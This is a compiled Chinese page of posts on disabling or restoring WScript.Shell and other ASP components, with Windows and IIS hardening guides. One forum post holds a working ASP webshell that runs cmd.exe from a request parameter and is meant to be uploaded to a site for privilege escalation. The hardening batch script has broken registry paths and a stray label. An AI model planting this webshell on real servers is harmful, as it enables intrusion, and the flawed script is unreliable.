WebShell'S Blog
蛋疼的人生不需要解释!
导航网盘存档链接留言关于Rss
首页安全技术新闻工具
删除、恢复wscript.shell
分类:技术 | 2012-08-23 | 撸过 1,248 次0人扯蛋
由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。
恢复wscript.shell
建议如果真的为了安全一定要删除这些!
下面给出卸载和删除的方法
卸载wscript.shell对象,在cmd下或直接运行:
regsvr32 /u %windir%\system32\WSHom.Ocx
卸载FSO对象,在cmd下或直接运行:
regsvr32.exe /u %windir%\system32\scrrun.dll
卸载stream对象,在cmd下或直接运行:
regsvr32 /s /u "C:\ProgramFiles\CommonFiles\System\ado\msado15.dll"
如果想恢复的话只需要去掉/U 即可重新再注册以上相关ASP组件,这样子就可以用了
本站内容均为原创,转载请务必保留署名与链接!
删除、恢复wscript.shell:https://www.webshell.cc/3952.html
标签: webshell , 数据库
相关日志
wscript.shell删除解决办法只看楼主收藏回复
爱滚床的Pony
核心会员6
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60>
")
response.write("<input type=submit value='执行'></form>")
%>
保存为一个asp文件,然后传到网站目录上去
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
我用此成功运行过cacls命令。
第二那就是运行时出错,可能限制某些代码执行。
关闭网站的wscript.shell命令行执行
将下面的代码保存为一个.BAT文件,( 以下均以 WIN2000 为例,如果使用2003,则系统文件夹应该是 C:\WINDOWS\ )
复制代码 代码如下:
regsvr32/u C:\WINNT\System32\wshom.ocx
del C:\WINNT\System32\wshom.ocx
regsvr32/u C:\WINNT\system32\shell32.dll
del C:\WINNT\system32\shell32.dll
然后运行一下,WScript.Shell, Shell.application, WScript.Network就会被卸载了。可能会提示无法删除文件,不用管它,重启一下服务器,你会发现这三个都提示“×安全”了。
如何卸载Wscript.Shell等对象
1、卸载wscript.shell对象
在cmd下运行:regsvr32 WSHom.Ocx /u
2、卸载FSO对象
在cmd下运行:regsvr32.exe scrrun.dll /u
3、卸载stream对象
在cmd下运行:
regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll"
如果要重新启用:请把/u参数对掉就行了!
禁止WScript.Shell
防范此类病毒的方法就是将Windows scripting host卸载掉,
具体方法是:我的电脑→控制面板→添加/删除程序→安装WINDOWS→
附件→详细资料→Windows scripting host→确定。其实还有一种方法更简单,
依次键入下面两段命令:regsvr32/u wshom.ocx回车、regsvr32/u wshext.dll回车,
就可以把注册表中.wsh对象的注册值删掉。这样那些必须依靠对象运行的病毒就因
为找不着对象而无法运行下去。
\\\\\\\\\\\\\\\\\\\\\\\\\\
防范Wscript.Shell组件的方法:
可以通过修改注册表,将此组件改名。
HKEY_CLASSES_ROOT\WScript.Shell\及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
防范Shell.Application组件的方法:
可以通过修改注册表,将此组件改名。
HKEY_CLASSES_ROOT\Shell.Application\
及
HKEY_CLASSES_ROOT\Shell.Application.1\
改名为其它的名字,如:改为Shell.Application_ChangeName或Shell.Application.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了。
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
======================================================
以上是海洋中的相关代码,从上面的代码我们不难看出一般ASP木马、Webshell主要利用了以下几类ASP组件:
① WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8)
② WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)
③ WScript.Network (classid:093FF999-1EA0-4079-9525-9614C3504B74)
④ WScript.Network.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74)
⑤ FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)
⑥ Adodb.stream (classid:{00000566-0000-0010-8000-00AA006D2EA4})
⑦ Shell.applicaiton....
hehe,这下我们清楚了危害我们WEB SERVER IIS的最罪魁祸首是谁了!!开始操刀,come on...
2:解决办法:
① 删除或更名以下危险的ASP组件:
WScript.Shell、WScript.Shell.1、Wscript.Network、Wscript.Network.1、adodb.stream、
Shell.application
开始------->运行--------->Regedit,打开注册表编辑器,按Ctrl+F查找,依次输入以上
Wscript.Shell等组件名称以及相应的ClassID,然后进行删除或者更改名称(这里建议大家更名,如
果有部分网页ASP程序利用了上面的组件的话呢,只需在将写ASP代码的时候用我们更改后的组件名
称即可正常使用。当然如果你确信你的ASP程序中没有用到以上组件,还是直
接删除心中踏实一些^_^,按常规一般来说是不会做到以上这些组件的。删除或更名后,iisreset
重启IIS后即可升效。)
[注意:由于Adodb.Stream这个组件有很多网页中将用到,所以如果你的服务器是开虚拟主机的话,
建议酢情处理。]
② 关于 File System Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)即常说的FSO的
安全问题,如果您的服务器必需要用到FSO的话,(部分虚拟主机服务器一般需开FSO功能)可以参照本人的另一篇关于FSO安全解决办法的文章:Microsoft Windows 2000 Server FSO 安全隐患解决办法。如果您确信不要用到的话,可以直接反注册此组件即可。
③ 直接反注册、卸载这些危险组件的方法:(实用于不想用①及②类此类烦琐的方法)
卸载wscript.shell对象,在cmd下或直接运行:regsvr32 /u %windir%/system32/WSHom.Ocx
卸载FSO对象,在cmd下或直接运行:regsvr32.exe /u %windir%/system32/scrrun.dll
卸载stream对象,在cmd下或直接运行: regsvr32 /s /u "C:/Program Files/Common Files/System/ado/msado15.dll"
如果想恢复的话只需要去掉 /U 即可重新再注册以上相关ASP组件例如:regsvr32.exe %windir%/system32/scrrun.dll
④ 关于Webshell中利用set domainObject = GetObject("WinNT://.")来获取服务器的进程、服务以及
用户等信息的防范,大家可以将服务中的Workstation[提供网络链结和通讯]即Lanmanworkstation服务停止
并禁用即可。此处理后,Webshell显示进程处将为空白。
3 按照上1、2方法对ASP类危险组件进行处理后,用阿江的asp探针测试了一下,"服务器CPU详情"和"服务
器操作系统"根本查不到,内容为空白的。再用海洋测试Wsript.Shell来运行cmd命令也是提示Active无法创建
对像。大家就都可以再也不要为ASP木马危害到服务器系统的安全而担扰了
如何关闭和开启 Wscript.Shell组件
我来答 分享 举报 浏览 8141 次
1个回答 #活动# 参与《复联4》问答讨论,赢免费影票!
半夏轻浅K
来自电脑网络类芝麻团 推荐于2017-12-16
关闭:
1、运行(打开)Wscript.Shell
regsvr32 %windir%\system32\wshom.ocx
2、卸载(关闭)Wscript.Shell
regsvr32 /u %windir%\system32\wshom.ocx
3、运行(打开)Wscript.Shell
regsvr32 %windir%\system32\shell32.dll
4、卸载(关闭)Wscript.Shell
regsvr32 /u %windir%\system32\shell32.dll
开启:
启用组件,先确定system32目录下wshom.ocx组件存在,然后
命令:
CMD> regsvr32 WSHom.Ocx
本文来源:http://www.t00ts.net/post-24.html
打造Tomcat安全启动帐号_百度经验
https://jingyan.baidu.com/article/c74d6000457c670f6a595d81.html
新建一个帐户
1. 用”ITOMCAT_计算机名”建立一个普通用户
2. 为其设置一个密码
3. 保证”密码永不过期”(PassWord Never Expires)被选中.
打造Tomcat安全启动帐号
2
修改Tomcat安装文件夹的访问权限
1. 选定环境参数CATALINA_HOME或TOMCAT_HOME指向的Tomcat安装文件夹。
2. 为”ITOMCAT_计算机名”用户赋予读、写、执行的访问权限。
3. 为”ITOMCAT_计算机名”用户赋予对WebApps文件夹的只读访问权限。
4. 如果某些Web应用程序需要写访问权限,单独为其授予对那个文件夹的写访问权限。
打造Tomcat安全启动帐号
3
Tomcat作为系统服务
1. 到”控制面板”,选择”管理工具”,然后选择”服务”。
2. 找到Tomcat:比如Apache Tomcat.exe等等,打开其”属性”。
3. 选择其”登录”(Log)标签。
4. 选择”以…登录”(Log ON Using)选项。
5. 键入新建的”ITOMCAT_计算机名”用户作为用户名。
6. 输入密码。
7. 重启机器。
4
在DOS窗口下运行Tomcat步骤:
1. 在”开始”按钮的”运行”框中键入CMD以打开一个DOS窗口。
2. 键入”RunAs /user:ITOMCAT_计算机名 CMD.exe”命令。
3. 在询问”ITOMCAT_计算机名”用户的密码时输入设置的密码。
4. 这将打开一个新的DOS窗口。
5. 在新开的DOS窗口中,转换到Tomcat的bin文件夹内。
6. 键入”catalina run”命令。
7. 关闭第一个DOS窗口。
5
设置一下程序
CMD.EXE NET.EXE ATTRIB.EXE At.EXE NET1.EXE FTP.EXE TELNET.EXE COMMAND.COM CAcls.EXE netstat.exe;system 全部权限 ,其它用户无权限。
服务器的安全配置听语音
|浏览:1654|更新:2011-11-28 16:22
好象服务器安全是一个永恒不变的话题。
服务器一般是游戏服务器和网站服务器,今天我们就说说网站服务器的安全吧。
工具/原料
服务器
步骤/方法
首先,防漏洞
对于漏洞,广大人民最常用的就是打补丁。虽然打补丁能防住一些攻击者的攻击,但对于一些未被公布的0day漏洞。打补丁又有什么用呢?如09年1月份的本地提权0day,漏洞利用程序都快泛滥成灾了。那段时间大家都在努力地拿webshell争取能拿到更多的肉鸡,我也不例外,我拿到很多webshell之后,就拼命地提权开远程桌面服务,拿N多台服务器,可见0day漏洞的可怕,但有一台服务器例外了,我在进行提权时,总是失败…… 搞得我想放弃…… 心想会不会网页不是在IIS下解析的?带着疑问,我输入 tasklist /v 找到IIS的进程,再输入netstat –ano 把找到的PID和开80端口PID 对比,结果一样啊!靠!难道漏洞被补了?自己去微软转了一圈也没发现出什么补丁。后来我发现了一个进程 是某某公司出的防火墙。去百度一查,发现该防火墙有防溢出功能,无奈啊……只好收手。学了2年的Hacking发现很多漏洞都出在溢出上,所以我们必须装个防溢出的东西。除了本地溢出提权外还有写入启动项提权拉,什么SU提权拉,和Pcanywhere之类的,由于这些东西都是攻击者常用的鬼把戏,所以尽量不要装这些东西,SU可以找微软的FTP替上,Pcanywhere,VNC,Radmin之类的,我们可以用微软的远程桌面服务替上。还有WScript.Shell组件定要删,没了WScript.Shell看攻击者们还搞个毛哩!!!最好把net.exe和net1.exe也给禁了吧!!!哈哈,够狠的 。(大家以后抓不到鸡,别拿番茄和鸡蛋扔我哈)
第二呢
就是限制目录拉,我们可以把服务器上网站的目录分开来,并不让IIS帐户和USER帐户对其他文件夹或盘有读取或写入的权限,这样就算网站被挂马了,也不怕服务器上的其他网站跟着遭殃。对于一些专门用来储存用户上传文件或图片的目录,不能给脚本文件执行权限,这样就算专门用来储存用户上传文件或图片的目录出现N多木马也无所谓。
第三呢
就是防扫描,服务器只需开21,80,1433,3306,就行了。其他的全给防火墙堵上就行了。还有就是攻击者经常用 啊D注入工具 中的网站管理入口检查来扫描网站目录的某些信息,所以我们可以把404页面改成其他的页面 或把数据包的头几个404给改成其他的,这样一般的攻击者会遇难而退。我们也可以把网站管理入口改成其他的,而且把网站管理入口给泄露出来,那么80%以上的攻击者会退出。
第四呢
防社会工程学,所谓社会工程学呢,我就不多做介绍了,相信看过 凯文•米特尼克的《欺骗的艺术》的人都很清楚。对于有装mssql或mysql的服务器,要把连接数据帐号的权限弄低点,有条件的可以再去租个服务器来搞站库分离,对于一些危险的储存过程要删掉,至于怎么删,大家可以到华夏找找看或去百度搜下就一大堆。数据库密码或帐号要设置得和系统帐号密码不一样。系统帐号和密码千万不能随便找个记上就直接放在服务器,万一被XX可别哭爹喊娘啊。
第五
漏洞的修补,漏洞的修补针对网站程序,补丁去网上找就有了,在打补丁之前,先看下数据库有没有被插马,没有就拿干净的备份直接覆盖网站程序,但不要覆盖数据库,不然到时候可别哭得惊天动地的啊,如果数据库被插马了,那就清除之,再拿干净的备份直接覆盖网站程序者乎!
文章就写到这了,虽防范不能做到100%抵御攻击者,但能阻挡70%以上的攻击,
如果本文章对您有帮助的话,欢迎您多多宣传华夏联盟。
以上为华夏联盟:BY:屠站高手所写。老文重发
7招做好Windows服务器安全听语音
浏览:800|更新:2012-07-10 11:35|标签:windows 服务器
7招做好Windows服务器安全17招做好Windows服务器安全27招做好Windows服务器安全37招做好Windows服务器安全4
分步阅读
进来频发的网络安全事件,足以引起我们对网络安全的重视,个人站长网站安全也不容忽视。不仅网站要固若金汤,服务器更要坚不可摧,否则服务器将成为你网站安全的“短板”。
谈到Windows安全可以说是很糟糕,本文列出了一些Windows服务器安全技巧,可以帮助你搭建一个相对安全的服务器。
工具/原料
安全卫士
密码生成器
步骤/方法
不安装不必要的软件
服务器不能像自己的电脑一样什么软件都装,比如你的服务器仅仅放一个ASP网站,那么只需要IIS及防火墙之类的安全软件即可。如非必要也不要去装serv-u之类的软件,因为不少服务器软件经常会出现各种各样的漏洞,这样会给“入侵者”留下可乘之机。
及时更新补丁
经常关注最新的漏洞补丁,然后选择必要的进行修复。一些软件的漏洞也要修复,这样才可以最大限度的确保服务器的安全。如果觉得有困难可以使用360进行有选择的更新,安装360安全卫士后进入漏洞修复。
7招做好Windows服务器安全
不使用弱口令
弱口令这种低级错误,一直在被入侵的原因有很大的占有率,然而这是非常容易避免的。我们在设置密码时最好数字、字母、符号混合使用,长度要大于等于6位数,不要使用生日、姓名等和自己相关的密码。
如果不怕麻烦的话,可以使用百度应用随机密码生成器,生成随机密码。
7招做好Windows服务器安全
关闭不必要的端口和服务
用netstat -an命令查看开放的端口,如发现一些不必要的端口可以使用IP安全策略来关闭。查到的端口只要用不到就可以关闭,也可以通过防火墙软件对危险端口进行屏蔽。服务关闭一些用不到的即可,如果对Windows服务不了解尽量查阅相关资料进行关闭。
修改3389默认端口
打开注册表修改如下两个注册表项:
1.HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WDS/RDPWD/TDS/TCP
2.HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WINSTATIONS/RDP-TCP/
设置需使用十进制,然后设置成需要的端口即可。如下图:
7招做好Windows服务器安全
限制目录权限
1.建议给每个网站设置独立用户
2.设置各磁盘administrator、system拥有完全控制权限
3.设置Documents and Settings及所有子目录administrator、system拥有完全控制权限
4.设置cacls.exe、cmd.exe、net.exe、net1.exe、ftp.exe、tftp.exe、telnet.exe、netstat.exe、regedit.exe、at.exe、attrib.exe、format.com、del文件administrator、system拥有完全控制权限
5.C盘下inetpub目录如无必要建议删除
7招做好Windows服务器安全
7
安装安全软件
建议安装杀毒软件、防火墙各一个,防火墙一定要有防止CC、ARP、SQL注入等功能。安装杀毒软件的目的是为了防止上传病毒木马后,利用管理员的疏忽进行执行从而服务器被控制。安装防火墙的目的则为了防止网络攻击,可以可以避免一些不必要的攻击。
做好以上七招可以防止一些常见的服务器入侵,从而让服务器上的网站更加安全。
7招做好Windows服务器安全_百度经验
https://jingyan.baidu.com/article/642c9d34ab439b644b46f756.html
Win2003的基本安全配置听语音
|浏览:2855|更新:2012-10-22 16:46
Win2003的基本安全配置1Win2003的基本安全配置2Win2003的基本安全配置3Win2003的基本安全配置4
分步阅读
win2003 虽然以出来很多年了,但还是有很大的用户群,主要是win 服务器系统本来就不多,2003 相对2008来说占资源会更小一点,尤其是VPS2003比2008合适。其实也算老生常谈吧,之前的文章以介绍了如何配置IIS 建站 以及 asp php 坏境,也随带了一下 系统安全需要注意的地方但是没有详细说明,今天抽点时间 做个详细说明。
方法/步骤
更新系统补丁
装完系统后,配置了IIS,先不要着急的建站,先把系统安全补丁打上。
点击开始菜单—>所有程序—>Windows Update 按照提示进行补丁的安装。
Win2003的基本安全配置
启动系统防火墙
开始菜单-设置-控制面板- 网络连接-本地连接-属性-高级-启用-高级-设置
服务-勾选FTP服务 web 服务 远程桌面 这几个选项 (也可以在例外 那一栏选择或添加) 这样一设置等于 服务器只开启了 21 80 3389 3个端口。
默认情况下会禁ping 如果要开启 服务旁边 ICMP 进入后勾起 第一项 允许传回响应即可
Win2003的基本安全配置
三.修改远程桌面端口
修改远程端口可以有效的防止长期被扫描,小工具修改不放心还是手动修改注册表吧
修改注册表.
开始--运行--regedit
依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/
TERMINAL SERVER/WDS/RDPWD/TDS/TCP
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/
WINSTATIONS/RDP-TCP/
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
注意:前一步 以开启了系统防火墙 现在改了默认3389 端口 防火墙里也要添加个 10000的端口 要不一旦生效 远程桌面就进不去了,
修改完毕.重新启动服务器.才会生效.这一步不需要着急重启。连接的时候在IP后面加个端口号就可以了如 192.168.2:10000
修改磁盘权限
所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限包括系统盘,WEB盘一般只要给Administrators权限即可,一般单个网站配独立用户这个后面再配。
系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Documents and Settings\All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限
系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe、ftp.exe、tftp.exe、telnet.exe 、 netstat.exe、regedit.exe、at.exe、attrib.exe、format.com、del文件只给 Administrators 组和SYSTEM 的完全 控制权限
另将\System32\cmd.exe、format.com、ftp.exe转移到其他目录或更名
Documents and Settings下所有些目录都设置只给adinistrators权限。并且要一个一个目录查看,包括下面的所有子目录。 删除c:\inetpub目录
有部分软件可能需要Users 读取权限 才能运行这个根据软件安装目录设置 安装目录可以设置复杂点。
Win2003的基本安全配置
五.给每个独立网站创建独立用户
开始菜单-控制面板-管理工具-计数机管理-本地用户和用户组-用户组-单击右键创建组-web
回来用户-创建 如 web001 描述那些随便 密码复杂点 最好用记书本 复制下来先 因为等会还要用
打开IIS-以创建的站点 如web001-单击鼠标右键 属性 - 目录安全 - 编辑 -浏览-高级-选择你刚创建的那个用户 如web001 点确定-
复制之前的密码 一共要输入两次。OK 搞定
然后再回到IIS web001 右键 权限- 选择 创建的那个用户勾选权限 就ok了,这样就完成了 一个用户 对应一个站点的操作了。
Win2003的基本安全配置
Windows2003环境下的一键系统安全(更新)听语音
|浏览:86|更新:2014-08-12 15:47
批处理是目前服务器运维所经常使用的脚本语言。作为自动化方式,尤其在服务器方面如何更简单的使用此bat脚本。下面是我以前所写的批处理,可借鉴部分:
方法/步骤
@echo offecho ----------------------------------echo ----正在备份注册表 请稍后....----echo ----------------------------------reg export "HKEY_LOCAL_MACHINE" C:/reg_backup.regecho ----------------------echo ----注册表备份完成----echo ----------------------ping 127.0.0.1 -n 3 >nulecho -----------------------------------echo ----安全配置正在改写 请稍候...----echo -----------------------------------@ping 127.0.0.1 -n 3 >nul echo ----------------------echo ----正在禁用空连接----echo ----------------------reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t reg_dword /d 1 /fecho --------------------------echo ----禁用空连接设置完毕----echo --------------------------@ping 127.0.0.1 -n 3 >nul echo ------------------------echo ----正在删除默认共享----echo ------------------------reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v AutoShareServer /t reg_dword /d 0 /fecho ----------------------------echo ----删除默认共享设置完毕----echo ----------------------------@ping 127.0.0.1 -n 3 >nulecho ------------------------------echo ----正在修改TTL值请稍后...----echo ------------------------------reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v DefaultTTL /t reg_dword /d 53 /fecho -------------------echo ----TTL修改完毕----echo -------------------@ping 127.0.0.1 -n 3 >nulecho -----------------------echo ----防止syn洪水攻击----echo -----------------------reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v SynAttackProtect /t reg_dword /d 2 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v EnablePMTUDiscovery /t reg_dword /d 0 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NoNameReleaseOnDemand /t reg_dword /d 1 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v EnableDeadGWDetect /t reg_dword /d 0 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v KeepAliveTime /t reg_dword /d 300000 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v PerformRouterDiscovery /t reg_dword /d 0 /freg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v EnableICMPRedirects /t reg_dword /d 0 /fecho -------------------------------echo ----防止syn洪水攻击设置完毕----echo -------------------------------@ping 127.0.0.1 -n 3 >nulecho ------------------------------echo ------------------------------echo ---- 系统服务修改 ----echo ------------------------------echo ------------------------------@ping 127.0.0.1 -n 3 >nulecho --------------------echo ----修改3389端口----echo --------------------reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t reg_dword /d 44454 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP\Tcp" /v PortNumber /t reg_dword /d 44454 /fecho --------------------echo ----修改PORT完毕----echo --------------------@ping 127.0.0.1 -n 3 >nulecho -------------------------------------echo ----正在开启系统防火墙 请稍后....----echo -------------------------------------sc config sharedaccess start= auto & net start sharedaccessecho ------------------------echo ----系统防火墙已开启----echo ------------------------@ping 127.0.0.1 -n 3 >nulecho ----------------------------echo ----正在关闭共享打印服务----echo ----------------------------@sc config Spooler start= disabledsc config LanmanServer start= disabledsc config LmHosts start= disabledecho --------------------------echo ----已关闭共享打印服务----echo --------------------------@ping 127.0.0.1 -n 3 >nulecho ----------------------------echo ----正在关闭远程协助服务----echo ----------------------------@sc config RDSessMgr start= disabledecho --------------------------echo ----已关闭远程协助服务----echo --------------------------@ping 127.0.0.1 -n 3 >nulecho ------------------------------echo ----正在关闭远程注册表服务----echo ------------------------------@sc config RemoteRegistry start= disabledecho ----------------------------echo ----已关闭远程注册表服务----echo ----------------------------@ping 127.0.0.1 -n 3 >nulecho ----------------------------echo ----关闭自动硬件播放通知----echo ----------------------------sc config ShellHWDetection start= disabledecho -----------------------echo ----自动播放通知关闭---echo -----------------------@ping 127.0.0.1 -n 3 >nulecho ----------------------------------------echo ----正在关闭替换凭据下的启动进程服务----echo ----------------------------------------sc config seclogon start= disabledecho --------------------------echo ----已关闭启动进程服务----echo --------------------------@ping 127.0.0.1 -n 3 >nulecho ------------------------------------echo ----IEEE 802.11 适配器的自动配置----echo ------------------------------------sc config WZCSVC start= disabledecho ------------------echo ----已关闭IEEE----echo ------------------@ping 127.0.0.1 -n 3 >nulecho --------------------------echo ----客户端跟踪服务关闭----echo --------------------------sc config TrkSvr start= disabledsc config MSDTC start= disabled echo ----------------------------echo ----已关闭客户端跟踪服务----echo ----------------------------@ping 127.0.0.1 -n 3 >nulecho --------------------echo ----帮助中心关闭----echo --------------------sc config helpsvc start= disabled echo --------------------------echo ----已关闭帮助中心服务----echo --------------------------@ping 127.0.0.1 -n 3 >nulecho --------------------------------echo --------------------------------echo ---- 系统权限加固 ----echo --------------------------------echo --------------------------------echo -------------------------------------------------------echo ----C盘(系统盘) (administrators,system完全控制权限)----echo -------------------------------------------------------cacls C:\ /t /c /g administrators:F system:F echo -------------------------------------------echo ----Common Files (everyone用户只读权限)----echo -------------------------------------------Cacls "C:\Program Files\Common Files" /t /e /c /g everyone:Recho -------------------------------------------------------------echo ----IIS Temporary Compressed Files (everyone用户更改权限)----echo -------------------------------------------------------------Cacls "C:\WINDOWS\IIS Temporary Compressed Files" /t /e /c /g everyone:C echo --------------------------------------------echo ----Microsoft.Net (everyone用户只读权限)----echo --------------------------------------------Cacls C:\WINDOWS\Microsoft.Net /t /e /c /g everyone:R echo ------------------------------------------------------echo ----Temporary ASP.NET Files (everyone用户更改权限)----echo ------------------------------------------------------Cacls "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files" /t /e /c /g everyone:C echo ------------------------------------------------------echo ----Temporary ASP.NET Files (everyone用户更改权限)----echo ------------------------------------------------------Cacls "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files" /t /e /c /g everyone:C echo -------------------------------------------echo ----Registration (everyone用户读取权限)----echo -------------------------------------------Cacls C:\WINDOWS\Registration /t /e /c /g everyone:Recho -----------------------------------echo ----Temp (everyone用户更改权限)----echo -----------------------------------Cacls C:\WINDOWS\Temp /t /e /c /g everyone:C echo ---------------------------------------echo ----assembly (everyone用户读取权限)----echo ---------------------------------------Cacls C:\WINDOWS\assembly /t /e /c /g everyone:Recho -------------------------------------echo ----5200kxs.com (everyone用户读取权限)----echo -------------------------------------Cacls C:\WINDOWS\WinSxS /t /e /c /g everyone:Recho ------------------------------------echo ----Fonts (everyone用户读取权限)----echo ------------------------------------Cacls C:\WINDOWS\Fonts /t /e /c /g everyone:Recho ---------------------------------------echo ----System32 (everyone用户读取权限)----echo ---------------------------------------Cacls C:\WINDOWS\System32 /t /e /c /g everyone:Recho ------------------------------------------echo ----msdtc (networkservice用户更改权限)----echo ------------------------------------------Cacls C:\windows\system32\msdtc /t /e /c /g networkservice:C echo -----------------------------------------------------echo ----ASP Compiled Templates (everyone用户更改权限)----echo -----------------------------------------------------Cacls "C:\WINDOWS\system32\inetsrv\ASP Compiled Templates" /t /e /c /g everyone:Cecho ------------------------------------echo ----*.exe (去除everyone用户权限)----echo ------------------------------------Cacls C:\WINDOWS\System32\*.exe /e /c /r everyone echo ------------------------------------echo ----cmd.exe (去除system用户权限)----echo ------------------------------------Cacls C:\WINDOWS\System32\cmd.exe /e /c /r system echo ------------------------------------echo ----net.exe (去除system用户权限)----echo ------------------------------------Cacls C:\WINDOWS\System32\net.exe /e /c /r systemecho -------------------------------------echo ----net1.exe (去除system用户权限)----echo -------------------------------------Cacls C:\WINDOWS\System32\net1.exe /e /c /r systemecho ----------------------------------------echo ----msdtc.exe (everyone用户读取权限)----echo ----------------------------------------Cacls C:\WINDOWS\System32\msdtc.exe /e /c /g everyone:Recho ------------------------------------------echo ----dllhost.exe (everyone用户读取权限)----echo ------------------------------------------Cacls C:\WINDOWS\System32\dllhost.exe /e /c /g everyone:Recho ------------------------------------------echo ----svchost.exe (everyone用户读取权限)----echo ------------------------------------------Cacls C:\WINDOWS\System32\svchost.exe /e /c /g everyone:Recho --------------------echo --------------------echo ----系统加固完毕----echo --------------------echo --------------------@ping 127.0.0.1 -n 3 >nulecho -----------------------------echo ----安全设置完毕 欢迎使用----echo -----------------------------echo ------------------echo ----重启服务器----echo ------------------@ping 127.0.0.1shutdown -r@pause
防止服务器被黑的技巧有哪些?听语音
|浏览:507|更新:2015-01-26 14:41|标签:服务器
在频频恶意攻击用户、系统漏洞层出不穷的今天,作为网络治理员、系统治理员虽然在服务器的安全上都下了不少功夫,诸如及时打上系统安全补丁、进行一些常规的安全配置,但有时仍不安全。因此必须恶意用户入侵之前,通过一些系列安全设置,来将入侵者们挡在“安全门”之外,下面就将最简单、最有效的防(Overflow)溢出、本地提供权限攻击类的解决办法给大家分享。
一、如何防止溢出类攻击
1
尽最大的可能性将系统的漏洞补丁都打完,最好是比如Microsoft Windows Server系列的系统可以将自动更新服务打开,然后让服务器在您指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。假如您的服务器为了安全起见 禁止了对公网外部的连接的话,可以用Microsoft WSUS服务在内网进行升级。
2
停掉一切不需要的系统服务以及应用程序,最大限能的降底服务器的被攻击系数。比如前阵子的MSDTC溢出,就导致很多服务器挂掉了。其实假如 WEB类服务器根本没有用到MSDTC服务时,您大可以把MSDTC服务停掉,这样MSDTC溢出就对您的服务器不构成任何威胁了。
3
启动TCP/IP端口的过滤,仅打开常用的TCP如21、80、25、110、3389等端口;假如安全要求级别高一点可以将UDP端口关闭,当然假如这样之后缺陷就是如在服务器上连外部就不方便连接了,这里建议大家用IPSec来封UDP。在协议筛选中”只答应”TCP协议(协议号为:6)、 UDP协议(协议号为:17)以及RDP协议(协议号为:27)等必需用协议即可;其它无用均不开放。
4
启用IPSec策略:为服务器的连接进行安全认证,给服务器加上双保险。如③所说,可以在这里封掉一些危险的端品诸如:135 145 139 445 以及UDP对外连接之类、以及对通读进行加密与只与有信任关系的IP或者网络进行通讯等等。(注:其实防反弹类木马用IPSec简单的禁止UDP或者不常用TCP端口的对外访问就成了,关于IPSec的如何应用这里就不再敖续,可以到服安讨论Search “IPSec”,就 会有N多关于IPSec的应用资料..)
END
删除、移动、更名或者用访问控制表列Access Control Lists (ACLs)控制要害系统文件、命令及文件夹:
